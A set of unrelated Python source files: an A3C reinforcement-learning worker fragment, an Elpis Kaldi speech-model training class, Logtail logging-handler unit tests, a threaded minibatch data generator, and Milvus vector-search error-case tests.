self.exploration_worker_difference = self.config.hyperparameters["exploration_worker_difference"]
self.action_types = action_types
self.results_queue = results_queue
self.episode_number = 0
self.gradient_updates_queue = gradient_updates_queue
def set_seeds(self, worker_num):
"""Sets random seeds for this worker"""
torch.manual_seed(self.config.seed + worker_num)
self.environment.seed(self.config.seed + worker_num)
def run(self):
"""Starts the worker"""
for ep_ix in range(self.episodes_to_run):
with self.optimizer_lock:
Base_Agent.copy_model_over(self.shared_model, self.local_model)
epsilon_exploration = self.calculate_new_exploration()
state = self.reset_game_for_worker()
done = False
self.episode_states = []
self.episode_actions = []
self.episode_rewards = []
self.episode_log_action_probabilities = []
self.critic_outputs = []
while not done:
action, action_log_prob, critic_outputs = self.pick_action_and_get_critic_values(self.local_model, state, epsilon_exploration)
next_state, reward, done, _ = self.environment.step(action)
self.episode_states.append(state)
self.episode_actions.append(action)
self.episode_rewards.append(reward)
self.episode_log_action_probabilities.append(action_log_prob)
self.critic_outputs.append(critic_outputs)
state = next_state
total_loss = self.calculate_total_loss()
self.put_gradients_in_queue(total_loss)
self.episode_number += 1
with self.counter.get_lock():
self.counter.value += 1
self.results_queue.put(np.sum(self.episode_rewards))
def calculate_new_exploration(self):
"""Calculates the new exploration parameter epsilon. It picks a random point within 3X above and below the
current epsilon"""
with self.counter.get_lock():
epsilon = 1.0 / (1.0 + (self.counter.value / self.epsilon_decay_denominator))
epsilon = max(0.0, random.uniform(epsilon / self.exploration_worker_difference, epsilon * self.exploration_worker_difference))
return epsilon
def reset_game_for_worker(self):
"""Resets the game environment so it is ready to play a new episode"""
state = self.environment.reset()
if self.action_types == "CONTINUOUS": self.noise.reset()
return state
def pick_action_and_get_critic_values(self, policy, state, epsilon_exploration=None):
"""Picks an action using the policy"""
state = torch.from_numpy(state).float().unsqueeze(0)
model_output = policy.forward(state)
actor_output = model_output[:, list(range(self.action_size))] #we only use first set of columns to decide action, last column is state-value
critic_output = model_output[:, -1]
action_distribution = create_actor_distribution(self.action_types, actor_output, self.action_size)
action = action_distribution.sample().cpu().numpy()
if self.action_types == "CONTINUOUS": action += self.noise.sample()
if self.action_types == "DISCRETE":
if random.random() <= epsilon_exploration:
action = random.randint(0, self.action_size - 1)
else:
action = action[0]
action_log_prob = self.calculate_log_action_probability(action, action_distribution)
return action, action_log_prob, critic_output
def calculate_log_action_probability(self, actions, action_distribution):
"""Calculates the log probability of the chosen action"""
policy_distribution_log_prob = action_distribution.log_prob(torch.Tensor([actions]))
return policy_distribution_log_prob
def calculate_total_loss(self):
"""Calculates the actor loss + critic loss"""
discounted_returns = self.calculate_discounted_returns()
if self.normalise_rewards:
discounted_returns = self.normalise_discounted_returns(discounted_returns)
critic_loss, advantages = self.calculate_critic_loss_and_advantages(discounted_returns)
actor_loss = self.calculate_actor_loss(advantages)
total_loss = actor_loss + critic_loss
return total_loss
def calculate_discounted_returns(self):
"""Calculates the cumulative discounted return for an episode which we will then use in a learning iteration"""
discounted_returns = [0]
for ix in range(len(self.episode_states)):
return_value = self.episode_rewards[-(ix + 1)] + self.discount_rate*discounted_returns[-1]
discounted_returns.append(return_value)
discounted_returns = discounted_returns[1:]
discounted_returns = discounted_returns[::-1]
return discounted_returns
def normalise_discounted_returns(self, discounted_returns):
"""Normalises the discounted returns by dividing by mean and std of returns that episode"""
mean = np.mean(discounted_returns)
std = np.std(discounted_returns)
discounted_returns -= mean
discounted_returns /= (std + 1e-5)
return discounted_returns
def calculate_critic_loss_and_advantages(self, all_discounted_returns):
"""Calculates the critic's loss and the advantages"""
critic_values = torch.cat(self.critic_outputs)
advantages = torch.Tensor(all_discounted_returns) - critic_values
advantages = advantages.detach()
critic_loss = (torch.Tensor(all_discounted_returns) - critic_values)**2
critic_loss = critic_loss.mean()
return critic_loss, advantages
def calculate_actor_loss(self, advantages):
"""Calculates the loss for the actor"""
action_log_probabilities_for_all_episodes = torch.cat(self.episode_log_action_probabilities)
actor_loss = -1.0 * action_log_probabilities_for_all_episodes * advantages
actor_loss = actor_loss.mean()
return actor_loss
def put_gradients_in_queue(self, total_loss):
"""Puts gradients in a queue for the optimisation process to use to update the shared model"""
self.local_optimizer.zero_grad()
total_loss.backward()
torch.nn.utils.clip_grad_norm_(self.local_model.parameters(), self.gradient_clipping_norm)
gradients = [param.grad for param in self.local_model.parameters()]
self.gradient_updates_queue.put(gradients)
|
model.py
|
import os
import re
import shutil
from pathlib import Path
from typing import Callable, Dict, Tuple
import threading
from elpis.engines.common.objects.command import run
from elpis.engines.common.objects.model import Model as BaseModel
from elpis.engines.common.objects.dataset import Dataset
from elpis.engines.common.objects.pron_dict import PronDict
from elpis.engines.kaldi.input.json_to_kaldi import create_kaldi_structure
from elpis.engines.common.objects.path_structure import PathStructure
from collections import OrderedDict
from subprocess import CalledProcessError
from jinja2 import Template
class KaldiModel(BaseModel): # TODO not thread safe
# _links = {**Model._links, **{"pron_dict": PronDict}}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pron_dict: PronDict = None
self.config['pron_dict_name'] = None # pron_dict hash has not been linked
self.config['ngram'] = 1 # default to 1 to make playing quicker
self.config['engine_name'] = 'kaldi'
stage_names = {
"0_setup.sh": "setup",
"1_prep_acoustic.sh": "acousticPreparation",
"2_feature_ext.sh": "featureExtraction",
"3_prep_lang_data.sh": "dataPreparation",
"4_lang_model_cr.sh": "modelCreation",
"5_mono.sh": "monophoneTraining",
"6_tri1.sh": "triphoneTraining"
}
super().build_stage_status(stage_names)
@classmethod
def load(cls, base_path: Path):
self = super().load(base_path)
self.pron_dict = None
return self
def link_pron_dict(self, pron_dict: PronDict):
self.pron_dict = pron_dict
self.config['pron_dict_name'] = pron_dict.name
@property
def ngram(self) -> int:
return int(self.config['ngram'])
@ngram.setter
def ngram(self, value: int) -> None:
self.config['ngram'] = value
def build_structure(self):
# task json-to-kaldi
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# Copy cleaned corpus from dataset to the model
dataset_corpus_txt = self.dataset.path.joinpath('cleaned', 'corpus.txt')
model_corpus_txt = self.path.joinpath('corpus.txt')
if os.path.exists(dataset_corpus_txt):
shutil.copy(f"{dataset_corpus_txt}", f"{model_corpus_txt}")
create_kaldi_structure(
input_json=f'{self.dataset.pathto.annotation_json}',
output_folder=f'{output_path}',
silence_markers=False,
corpus_txt=f'{model_corpus_txt}'
)
def train(self, on_complete:Callable=None):
def prepare_for_training():
print("prepare_for_training")
# task make-kaldi-subfolders
kaldi_structure = PathStructure(self.path)
local_kaldi_path = self.path.joinpath('kaldi')
local_kaldi_path.mkdir(parents=True, exist_ok=True)
kaldi_data_local_dict = local_kaldi_path.joinpath('data', 'local', 'dict')
kaldi_data_local_dict.mkdir(parents=True, exist_ok=True)
kaldi_data_local = local_kaldi_path.joinpath('data', 'local')
kaldi_data_local.mkdir(parents=True, exist_ok=True)
kaldi_data_test = local_kaldi_path.joinpath('data', 'test')
kaldi_data_test.mkdir(parents=True, exist_ok=True)
kaldi_data_train = local_kaldi_path.joinpath('data', 'train')
kaldi_data_train.mkdir(parents=True, exist_ok=True)
kaldi_conf = local_kaldi_path.joinpath('conf')
kaldi_conf.mkdir(parents=True, exist_ok=True)
kaldi_local = local_kaldi_path.joinpath('local')
kaldi_local.mkdir(parents=True, exist_ok=True)
# copy the pron dict
shutil.copy(f"{self.pron_dict.lexicon_txt_path}", f"{kaldi_data_local_dict.joinpath('lexicon.txt')}")
# task generate-kaldi-configs
path_file_path = kaldi_structure.path.joinpath('path.sh')
mfcc_file_path = kaldi_structure.conf.joinpath('mfcc.conf')
decode_config_file_path = kaldi_structure.conf.joinpath('decode.config')
template_path = Path('/elpis/elpis/engines/kaldi/templates')
path_resource = template_path.joinpath('path.sh')
mfcc_resource = template_path.joinpath('mfcc.conf')
decode_config_resource = template_path.joinpath('decode.config')
# task make-nonsil-phones > {{ .KALDI_OUTPUT_PATH }}/tmp/nonsilence_phones.txt
nonsilence_phones_path = kaldi_data_local_dict.joinpath('nonsilence_phones.txt')
# build a unnique non-sorted list of the phone symbols
# can't use sorting, because the rules may have order significance
# ignore comment lines that begin with #
seen = OrderedDict()
for line in open(self.pron_dict.l2s_path, "r"):
if line[0] == "#":
pass
else:
line = line.split()[1:]
if len(line) > 0:
line = line[0]
seen[line] = seen.get(line, 0) + 1
with nonsilence_phones_path.open(mode='w') as fout:
for (item, i) in seen.items():
fout.write("%s\n" % item)
with path_file_path.open(mode='w') as fout:
with path_resource.open() as fin:
content = Template(fin.read()).render(
{
'KALDI_ROOT': '/kaldi',
'HELPERS_PATH': '/kaldi-helpers',
'CORPUS_PATH': f'..{self.dataset.pathto.original}'
}
)
fout.write(content)
with mfcc_file_path.open(mode='w') as fout:
with mfcc_resource.open() as fin:
content = Template(fin.read()).render(
{
'MFCC_SAMPLE_FREQUENCY': '44100',
'MFCC_FRAME_LENGTH': '25',
'MFCC_LOW_FREQ': '20',
'MFCC_HIGH_FREQ': '22050',
'MFCC_NUM_CEPS': '7',
}
)
fout.write(content)
with decode_config_file_path.open(mode='w') as fout:
with decode_config_resource.open() as fin:
content = Template(fin.read()).render(
{
'DECODE_BEAM': '11.0',
'DECODE_FIRST_BEAM': '8.0'
}
)
fout.write(content)
try:
# task copy-generated-files
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# - cp {{ .KALDI_OUTPUT_PATH }}/tmp/json_splitted/training/corpus.txt {{ .KALDI_OUTPUT_PATH }}/kaldi/data/local/
shutil.move(f"{output_path.joinpath('training', 'corpus.txt')}", f"{kaldi_data_local}")
shutil.move(f"{output_path.joinpath('testing', 'segments')}", f"{kaldi_data_test.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('testing', 'text')}", f"{kaldi_data_test.joinpath('text')}")
shutil.move(f"{output_path.joinpath('testing', 'utt2spk')}", f"{kaldi_data_test.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('testing', 'wav.scp')}", f"{kaldi_data_test.joinpath('wav.scp')}")
shutil.move(f"{output_path.joinpath('training', 'segments')}", f"{kaldi_data_train.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('training', 'text')}", f"{kaldi_data_train.joinpath('text')}")
shutil.move(f"{output_path.joinpath('training', 'utt2spk')}", f"{kaldi_data_train.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('training', 'wav.scp')}", f"{kaldi_data_train.joinpath('wav.scp')}")
# task copy-phones-configs
optional_silence_file_path = kaldi_data_local_dict.joinpath('optional_silence.txt')
silence_phones_file_path = kaldi_data_local_dict.joinpath('silence_phones.txt')
with optional_silence_file_path.open(mode='w') as fout:
fout.write('SIL\n')
with silence_phones_file_path.open(mode='w') as fout:
fout.write('SIL\nsil\nspn\n')
shutil.copy(f"{template_path.joinpath('cmd.sh')}", f"{local_kaldi_path}")
shutil.copytree(f"{template_path.joinpath('stages')}", local_kaldi_path.joinpath('stages'))
for file in os.listdir(local_kaldi_path.joinpath('stages')):
os.chmod(local_kaldi_path.joinpath('stages').joinpath(file), 0o774)
shutil.copy(f"{template_path.joinpath('score.sh')}", f"{kaldi_local}")
run(f"cp -L -r /kaldi/egs/wsj/s5/steps {local_kaldi_path}/steps")
run(f"cp -L -r /kaldi/egs/wsj/s5/utils {local_kaldi_path}/utils")
# modified extract-wavs
for audio_file in os.listdir(self.dataset.pathto.resampled):
src = f'{self.dataset.pathto.resampled.joinpath(audio_file)}'
dst = f'{local_kaldi_path}'
shutil.copy(src, dst)
print('kaldi dirs preparation done.')
except OSError as error:
print('couldnt prepare kaldi dirs: ', error)
def train():
local_kaldi_path = self.path.joinpath('kaldi')
# Prepare (dump, recreate) main train log file
run_log_path = self.path.joinpath('train.log')
if os.path.isfile(run_log_path):
os.remove(run_log_path)
run(f"touch {run_log_path};")
# Organise stage logs in a dir
train_log_dir = self.path.joinpath('train-logs')
if os.path.exists(train_log_dir):
shutil.rmtree(train_log_dir)
os.mkdir(train_log_dir )
stage_count = 0
stages = os.listdir(local_kaldi_path.joinpath('stages'))
for stage in sorted(stages):
print(f"Stage {stage} starting")
self.stage_status = (stage, 'in-progress', '', 'starting')
# Create log file
stage_log_path = self.path.joinpath(os.path.join(train_log_dir, f'stage_{stage_count}.log'))
with open(stage_log_path, 'w+'):
pass
# Manipulate stage templates with user-defined settings
# TODO replace with jinja templates or something similar
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'r') as file :
filedata = file.read()
# Add settings to replace here
filedata = filedata.replace('lm_order=1', f'lm_order={self.ngram}')
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'w') as file:
file.write(filedata)
# Run the command, log output. Also redirect Kaldi sterr output to log. These are often not errors :-(
try:
stage_process = run(f"cd {local_kaldi_path}; stages/{stage} &> {stage_log_path}")
print('done')
print(f"Stage {stage} complete")
with open(stage_log_path, 'r') as file:
stage_log = file.read()
print(f"Stage {stage} log", stage_log)
self.stage_status = (stage, 'complete', '', stage_log)
# add to stage_log
stage_count = stage_count + 1
except CalledProcessError as error:
with open(stage_log_path, 'a+') as file:
print('stderr', error.stderr, file=file)
print('failed', file=file)
print(f"Stage {stage} failed")
self.stage_status = (stage, 'failed', '', 'LOG-C')
break
self.log = ''
# Concat all the files in the train-log dir
log_filenames = os.listdir(train_log_dir)
log_filenames.sort()
with open(run_log_path, 'w') as outfile:
for log_file in log_filenames:
with open(os.path.join(train_log_dir, log_file)) as infile:
log_contents = infile.read()
outfile.write(log_contents)
outfile.write("\n")
self.log += log_contents
def run_training_in_background():
def background_train_task():
prepare_for_training()
train()
self.status = 'trained'
self.results = KaldiModel.get_train_results(self)
on_complete()
self.status = 'training'
t = threading.Thread(target=background_train_task)
t.start()
if on_complete is None:
self.status = 'training'
prepare_for_training()
train()
self.status = 'trained'
self.results = KaldiModel.get_train_results(self)
else:
run_training_in_background()
return
def get_train_results(self):
log_file = self.path.joinpath('train.log')
results = {}
with log_file.open() as fin:
wer_lines = []
for line in reversed(list(fin)):
line = line.rstrip()
if "%WER" in line:
# use line to sort by best val
line_r = line.replace('%WER ', '')
wer_lines.append(line_r)
wer_lines.sort(reverse = True)
line = wer_lines[0]
line_split = line.split(None, 1)
wer = line_split[0]
line_results = line_split[1]
line_results = re.sub("[\[\]]", "", line_results)
results_split = line_results.split(',')
count_val = results_split[0].strip()
ins_val = results_split[1].replace(' ins', '').strip()
del_val = results_split[2].replace(' del', '').strip()
sub_val = results_split[3].replace(' sub', '').strip()
results = {"comparison_val": float(wer), # property common to all engines so the GUI can sort models by a result value
"wer": float(wer),
"count_val": str(count_val),
"ins_val": int(ins_val),
"del_val": int(del_val),
"sub_val": int(sub_val)}
print(results)
return results
|
test_handler.py
|
# coding: utf-8
from __future__ import print_function, unicode_literals
import mock
import time
import threading
import unittest2
import logging
from logtail.handler import LogtailHandler
class TestLogtailHandler(unittest2.TestCase):
source_token = 'dummy_source_token'
host = 'dummy_host'
@mock.patch('logtail.handler.FlushWorker')
def test_handler_creates_uploader_from_args(self, MockWorker):
handler = LogtailHandler(source_token=self.source_token, host=self.host)
self.assertEqual(handler.uploader.source_token, self.source_token)
self.assertEqual(handler.uploader.host, self.host)
@mock.patch('logtail.handler.FlushWorker')
def test_handler_creates_pipe_from_args(self, MockWorker):
buffer_capacity = 9
flush_interval = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
flush_interval=flush_interval
)
self.assertEqual(handler.pipe._maxsize, buffer_capacity)
@mock.patch('logtail.handler.FlushWorker')
def test_handler_creates_and_starts_worker_from_args(self, MockWorker):
buffer_capacity = 9
flush_interval = 9
handler = LogtailHandler(source_token=self.source_token, buffer_capacity=buffer_capacity, flush_interval=flush_interval)
MockWorker.assert_called_with(
handler.uploader,
handler.pipe,
buffer_capacity,
flush_interval
)
self.assertTrue(handler.flush_thread.start.called)
@mock.patch('logtail.handler.FlushWorker')
def test_emit_starts_thread_if_not_alive(self, MockWorker):
handler = LogtailHandler(source_token=self.source_token)
self.assertTrue(handler.flush_thread.start.call_count, 1)
handler.flush_thread.is_alive = mock.Mock(return_value=False)
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
logger.critical('hello')
self.assertEqual(handler.flush_thread.start.call_count, 2)
@mock.patch('logtail.handler.FlushWorker')
def test_emit_drops_records_if_configured(self, MockWorker):
buffer_capacity = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
drop_extra_events=True
)
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
logger.critical('hello')
logger.critical('goodbye')
log_entry = handler.pipe.get()
self.assertEqual(log_entry['message'], 'hello')
self.assertTrue(handler.pipe.empty())
self.assertEqual(handler.dropcount, 1)
@mock.patch('logtail.handler.FlushWorker')
def test_emit_does_not_drop_records_if_configured(self, MockWorker):
buffer_capacity = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
drop_extra_events=False
)
def consumer(q):
while True:
if q.full():
while not q.empty():
_ = q.get(block=True)
time.sleep(.2)
t = threading.Thread(target=consumer, args=(handler.pipe,))
t.daemon = True
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
logger.critical('hello')
self.assertTrue(handler.pipe.full())
t.start()
logger.critical('goodbye')
logger.critical('goodbye2')
self.assertEqual(handler.dropcount, 0)
@mock.patch('logtail.handler.FlushWorker')
def test_error_suppression(self, MockWorker):
buffer_capacity = 1
handler = LogtailHandler(
source_token=self.source_token,
buffer_capacity=buffer_capacity,
raise_exceptions=True
)
handler.pipe = mock.MagicMock(put=mock.Mock(side_effect=ValueError))
logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(handler)
with self.assertRaises(ValueError):
logger.critical('hello')
handler.raise_exceptions = False
logger.critical('hello')
|
generator.py
|
from __future__ import division, print_function
import contextlib
import os
import threading
import time
if not hasattr(contextlib, 'ExitStack'):
import contextlib2 as contextlib
import numpy as np
try:
import queue
except ImportError:
import Queue as queue
from visual_dynamics.utils.container import ImageDataContainer
from visual_dynamics.utils.transformer import Transformer, OpsTransformer, ImageTransformer, CompositionTransformer
# generator_queue copied from Keras library: https://github.com/fchollet/keras/blob/master/keras/models.py
def generator_queue(generator, max_q_size=10, wait_time=0.05, nb_worker=1):
q = queue.Queue()
_stop = threading.Event()
def data_generator_task():
while not _stop.is_set():
try:
if q.qsize() < max_q_size:
try:
generator_output = next(generator)
# indices_generator
except StopIteration:
_stop.set()
break
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
generator_threads = [threading.Thread(target=data_generator_task)
for _ in range(nb_worker)]
for thread in generator_threads:
thread.daemon = True
thread.start()
return q, _stop, generator_threads
class ParallelGenerator(object):
def __init__(self, generator, max_q_size=10, wait_time=0.05, nb_worker=1):
self.wait_time = wait_time
self.data_gen_queue, self._data_stop, self.generator_threads = \
generator_queue(generator, max_q_size=max_q_size, wait_time=wait_time, nb_worker=nb_worker)
self._size = generator.size
def __iter__(self):
return self
def __next__(self):
while not self._data_stop.is_set() or not self.data_gen_queue.empty() or \
any([thread.is_alive() for thread in self.generator_threads]):
if not self.data_gen_queue.empty():
return self.data_gen_queue.get()
else:
time.sleep(self.wait_time)
raise StopIteration
def next(self):
# python 2 compatible
return self.__next__()
def __del__(self):
self._data_stop.set()
for thread in self.generator_threads:
thread.join()
@property
def size(self):
return self._size
class DataGenerator(object):
def __init__(self, container_fnames, data_name_offset_pairs, transformers=None, once=False, batch_size=0, shuffle=False, dtype=None):
"""
Iterate through all the data once or indefinitely. The data from
contiguous files are treated as if they are contiguous. All of the
returned minibatches contain batch_size data points. If shuffle=True,
the data is iterated in a random order, and this order differs for each
pass of the data.
Note: this is not as efficient as it could be when shuffle=False since
each data point is retrieved one by one regardless of the value of
shuffle.
A batch_size of 0 denotes to return data of batch size 1 but with the
leading singleton dimensioned squeezed.
"""
if isinstance(container_fnames, str):
container_fnames = [container_fnames]
self._container_fnames = [os.path.abspath(fname) for fname in container_fnames]
self._data_name_offset_pairs = data_name_offset_pairs
self.transformers_dict = transformers or dict()
self.once = once
self._batch_size = None
self._squeeze = None
self.batch_size = batch_size
self.shuffle = shuffle
self.dtype = dtype
self._lock = threading.Lock()
offset_limits = dict()
for data_name, offset in data_name_offset_pairs:
offset_min, offset_max = offset_limits.get(data_name, (np.inf, -np.inf))
if isinstance(offset, int):
offset_min = min(offset, offset_min)
offset_max = max(offset, offset_max)
elif isinstance(offset, slice):
assert offset.start < offset.stop
offset_min = min(offset.start, offset_min)
offset_max = max(offset.stop, offset_max)
elif isinstance(offset, (tuple, list)):
offset_min = min(offset_min, *offset)
offset_max = max(offset_max, *offset)
else:
raise ValueError("offset should be int, slice, tuple or list, but %s was given" % offset)
offset_limits[data_name] = (offset_min, offset_max)
# shift the offsets so that the minimum of all is zero
offset_all_min = min([offset_min for (offset_min, offset_max) in offset_limits.values()])
for data_name, (offset_min, offset_max) in offset_limits.items():
offset_limits[data_name] = (offset_min - offset_all_min,
offset_max - offset_all_min)
with contextlib.ExitStack() as stack:
containers = [stack.enter_context(ImageDataContainer(fname)) for fname in self._container_fnames]
num_steps_per_traj = []
num_steps_per_container = []
num_trajs_per_container = []
for container in containers:
data_name_to_data_sizes = {}
for data_name, (offset_min, offset_max) in offset_limits.items():
num_trajs, num_steps = container.get_data_shape(data_name)
data_name_to_data_sizes[data_name] = np.array([num_steps - offset_max] * num_trajs)
data_sizes = np.array(list(data_name_to_data_sizes.values())).min(axis=0)
num_steps_per_traj.extend(data_sizes)
num_steps_per_container.append(data_sizes.sum())
num_trajs_per_container.append(len(data_sizes))
self._num_steps_per_traj = num_steps_per_traj
self._num_steps_per_container = num_steps_per_container
self._num_trajs_per_container = num_trajs_per_container
self._num_steps_per_traj_cs = np.r_[0, np.cumsum(num_steps_per_traj)]
self._num_steps_per_container_cs = np.r_[0, np.cumsum(num_steps_per_container)]
self._num_trajs_per_container_cs = np.r_[0, np.cumsum(num_trajs_per_container)]
assert self._num_steps_per_traj_cs[-1] == self._num_steps_per_container_cs[-1]
self._excerpt_generator = self._get_excerpt_generator()
@property
def batch_size(self):
if self._batch_size == 1 and self._squeeze:
batch_size = 0
else:
batch_size = self._batch_size
return batch_size
@batch_size.setter
def batch_size(self, batch_size):
if batch_size == 0:
self._batch_size = 1
self._squeeze = True
else:
self._batch_size = batch_size
self._squeeze = False
@property
def squeeze(self):
return self._squeeze
def _get_local_inds(self, all_ind):
container_ind = np.searchsorted(self._num_steps_per_container_cs[1:], all_ind, side='right')
all_traj_iter = np.searchsorted(self._num_steps_per_traj_cs[1:], all_ind, side='right')
step_iter = all_ind - self._num_steps_per_traj_cs[all_traj_iter]
traj_iter = all_traj_iter - self._num_trajs_per_container_cs[container_ind]
return container_ind, traj_iter, step_iter
def _get_excerpt_generator(self):
indices = []
continue_extending = True
while True:
if len(indices) < self._batch_size and continue_extending:
if self.shuffle:
new_indices = np.random.permutation(self.size)
else:
new_indices = np.arange(self.size)
indices.extend(new_indices)
if self.once:
continue_extending = False
excerpt = np.asarray(indices[0:self._batch_size])
del indices[0:self._batch_size]
yield excerpt
def __iter__(self):
return self
def __next__(self):
with contextlib.ExitStack() as stack:
containers = [stack.enter_context(ImageDataContainer(fname)) for fname in self._container_fnames]
with self._lock:
excerpt = next(self._excerpt_generator)
if len(excerpt) == 0:
raise StopIteration
batch_data = []
for data_name, offset in self._data_name_offset_pairs:
transformer = self.transformers_dict.get(data_name, Transformer())
datum = None # initialize later to use dtype of first single_datum
for i, all_ind in enumerate(excerpt):
container_ind, traj_iter, step_iter = self._get_local_inds(all_ind)
if isinstance(offset, int):
offsets = [offset]
elif isinstance(offset, slice):
offsets = np.arange(offset.start, offset.stop, offset.step)
single_datum_list = []
for int_offset in offsets:
single_datum = containers[container_ind].get_datum(traj_iter, step_iter + int_offset, data_name)
single_datum = np.asarray(transformer.preprocess(single_datum), dtype=self.dtype)
single_datum_list.append(single_datum)
single_datum = np.asarray(single_datum_list)
if isinstance(offset, int):
single_datum = np.squeeze(single_datum, axis=0)
if datum is None:
datum = np.empty(((len(excerpt),) + single_datum.shape), dtype=single_datum.dtype)
datum[i, ...] = single_datum
batch_data.append(datum)
if self.squeeze:
batch_data = [np.squeeze(datum, axis=0) for datum in batch_data]
return tuple(batch_data)
def next(self):
# python 2 compatible
return self.__next__()
@property
def size(self):
"""
Possible number of data points that can be returned (accounting for offsets).
"""
return self._num_steps_per_traj_cs[-1]
def iterate_minibatches_generic(data, once=False, batch_size=0, shuffle=False):
if batch_size == 0:
non_zero_batch_size = 1
squeeze = True
else:
non_zero_batch_size = batch_size
squeeze = False
size = len(data[0])
assert all(len(datum) == size for datum in data)
indices = []
continue_extending = True
while indices or continue_extending:
if len(indices) < non_zero_batch_size and continue_extending:
if shuffle:
new_indices = np.random.permutation(size)
else:
new_indices = np.arange(size)
indices.extend(new_indices)
if once:
continue_extending = False
excerpt = np.asarray(indices[0:non_zero_batch_size])
del indices[0:non_zero_batch_size]
batch_data = [(datum[excerpt] if isinstance(datum, np.ndarray)
else [datum[ind] for ind in excerpt]) for datum in data]
if squeeze:
batch_data = [np.squeeze(batch_datum, axis=0) for batch_datum in batch_data]
yield batch_data
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('container_fname', nargs='+', type=str)
args = parser.parse_args()
image_transformer = CompositionTransformer(
[ImageTransformer(scale_size=0.125, crop_size=(32, 32)),
OpsTransformer(scale=2.0 / 255.0, offset=-1.0, transpose=(2, 0, 1))])
action_transformer = OpsTransformer(scale=0.1)
transformers = {'image': image_transformer, 'action': action_transformer}
data_name_offset_pairs = [('image', 0), ('action', 0), ('image', 1)]
generator = DataGenerator(args.container_fname,
data_name_offset_pairs=data_name_offset_pairs,
transformers=transformers,
batch_size=32, shuffle=True, once=True)
generator = ParallelGenerator(generator, nb_worker=4)
time.sleep(1.0)
start_time = time.time()
for i, batch_data in zip(range(4), generator):
print(batch_data[0].shape)
print(time.time() - start_time)
if __name__ == "__main__":
main()
|
test_search.py
|
import threading
import time
import pytest
import random
import numpy as np
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "search_collection"
epsilon = ct.epsilon
default_nb = ct.default_nb
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_no_connection")
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1, "err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
target: test the scenario which search the non-exist collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_no_collection "
"(searching the non-exist collection)")
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_release_collection")
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True, 10, 1)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_partition(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release partition
3. search with specifying the released partition
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_release_partition")
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 1000
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
target: test search with empty connection
method: search the empty collection
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_with_empty_collection")
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
